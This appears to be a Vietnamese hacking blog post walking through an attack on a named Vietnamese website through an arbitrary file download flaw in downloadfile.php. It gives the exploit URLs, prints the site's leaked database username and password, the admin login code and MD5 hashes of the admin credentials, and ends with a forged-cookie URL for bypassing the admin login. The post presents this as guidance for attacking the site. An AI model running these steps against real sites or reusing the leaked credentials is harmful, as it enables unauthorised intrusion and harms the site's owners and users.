Bug : www.abc.com/downloadfile.php?file=abc/def.zip
Khai thác : www.abc.com/downloadfile.php?file=index.php
Ngoài file index.php bạn có thể download nhiều file nữa , từ đó bạn có thể nghiên cứu mà tấn công.
Victim www.nhanhoanghia.com.vn
Code:
http://www.nhanhoanghia.com.vn/downloadfile.php?file=index.php
PHP Code:
include "include/sql.php";
include "include/init.php";
include "mynewsfunction.php";
include "myhtmlfunction.php";
include "myprofunction.php";
Code:
$server="localhost";
$username="nhanhoan_admin";
$password="ijnuhbygv";
$dbase="nhanhoan_db";
Choài database là nhanhoan_db => file : nhanhoan_db.sql
Test thử :
Code:
http://www.nhanhoanghia.com.vn/downloadfile.php?file=nhanhoan_db.sql
Tìm cách khác vậy,
download các file mà index.php include về.
Tìm được trong file mynewsfunction.php dòng :
Code:
//include "webadmin/init_fr.php";
=> http://www.nhanhoanghia.com.vn/webadmin/
Tiếp down trang login về :
Code:
http://www.nhanhoanghia.com.vn/downloadfile.php?file=webadmin/login.php
Code:
....
<form name="form1" method="post" action="check.php?action=login">...
Code:
<?
@session_start();
include("passinfo.php");
if($action == "login")
{
if(md5($username)!=$u)
{
echo "<script>
location.href='login.php';
</script>
";
exit();
}
if(md5($password)!=$p)
{
echo "<script>
location.href='login.php';
</script>
";
exit();
}
echo "<script>
location.href='cookie.php?user=$p';
</script>
";
exit();
}
if($action == "logout")
{
session_unregister("bdvn_user");
echo "<script>window.top.location.href = 'login.php';</script>";
}
if(!$bdvn_user)
{
echo "<script>window.top.location.href = 'login.php';</script>";
exit();
}
?>
Down nó zìa lun
Code:
<? $u = "62b8f89cf8e72905e8d3d5cd4e143bef"; $p = "6487171dedb7dd65df63f63365a7c6f1"; ?>
Để ý lại 1 chút : trong file check.php có 1 đoạn
location.href='cookie.php?user=$p';
àh ha vậy là hiểu gồi heheh , nếu thích thì tải file cookie.php zìa.
nhưng mà chúng ta có thể fake cookie trực tiếp :
http://nhanhoanghia.com.vn/webadmin/...php?user=admin
0 nhận xét:
Post a Comment